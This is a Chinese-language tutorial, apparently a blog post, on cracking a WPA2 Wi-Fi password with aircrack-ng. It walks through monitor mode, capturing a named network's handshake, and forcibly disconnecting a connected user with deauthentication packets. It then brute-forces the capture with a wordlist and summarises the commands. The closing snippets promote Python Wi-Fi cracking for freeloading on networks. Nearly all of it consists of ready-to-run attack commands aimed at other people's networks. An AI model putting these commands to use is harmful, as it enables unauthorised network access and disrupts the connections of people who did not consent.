iwconfig檢視網絡卡
啟動監聽模式,設定通道
airodump-ng wlan0掃瞄周邊熱點
找疾風劍豪這個
得到mac位址
2e:15:e1:28:56:08
準備抓握手包(需要有人連上了目標wifi,把他踢下線,在他重新連線的時候進行抓包操作)
airodump-ng -c 3 --bssid 2e:15:e1:28:56:08 -w /root/wpa2/yasuo wlan0
airodump-ng -c 3(通道) --bssid 2e:15:e1:28:56:08(目標wifimac位址) -w /root/wpa2/527(握手包儲存位址) wlan0(工作的網絡卡)
注意,-c引數不能丟,不然後續踢人下線的時候,會出現這個問題
等待一段時間,下面表示有5個人練了這個wifi
找乙個幸運兒,踢他下線
aireplay-ng -0 5 -a 2e:15:e1:28:56:08 -c 28:3a:4d:0b:6c:91 wlan0
aireplay-ng -0 5(傳送斷開連線包的數量) -a 2e:15:e1:28:56:08(wifi的mac位址) -c 28:3a:4d:0b:6c:91(幸運兒的裝置mac位址) wlan0(工作網絡卡)
一般來說斷開一兩次就可以抓到包,偶爾臉黑抓不到,就換乙個人踢,
抓到包後,在airdump-ng這裡可以看到
然後就是爆破了
aircrack-ng -w /root/wifi_password_dir/xato-net-10-million-passwords.txt yasuo-02.cap
aircrack-ng -w 字典位置 握手包位置
總結一下就是,
啟動:ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig wlan0 channel 10
掃瞄:airodump-ng wlan0
抓包:airodump-ng -c 3(通道) --bssid 2e:15:e1:28:56:08(目標wifimac位址) -w /root/wpa2/527(握手包儲存位址) wlan0(工作的網絡卡)
踢人:
aireplay-ng -0 5(傳送斷開連線包的數量) -a 2e:15:e1:28:56:08(wifi的mac位址) -c 28:3a:4d:0b:6c:91(幸運兒的裝置mac位址) wlan0(工作網絡卡)
爆破:aircrack-ng -w 字典位置 握手包位置
Python 破解 wifi 密碼
想蹭網?不知道wifi密碼?教你如何破解wifi密碼連上wifi 安裝pywifi庫 因為我已經安裝好了,這裡就不展示安裝成功的資訊了 這裡有點注意的地方是有些人命名安裝了pywifi,import pywifi執行的時候卻報錯,我也試過這樣 這裡只需要再安裝乙個comtypes庫就行了,只有三百k...
kali破解WIFI密碼
今天我們來學習一下通過kali和乙個好的字典來破解wifi密碼。宣告 此教程僅供學習研究使用,嚴禁使用此技術進行非法行為 首先我們需要乙個具有監聽功能的無線網絡卡 這裡我給大家推薦 rt3070 本章實驗通過虛擬機器vmware進行 先通過services.msc來開啟vmware usb arbi...
Python破解wifi密碼
提取碼 phbe import time 時間 import pywifi 破解wifi 密碼本路徑 path r c users administrator desktop passwd.txt wifi名稱 wifi name yyy jinan 獲取文字內容 file open path,r ...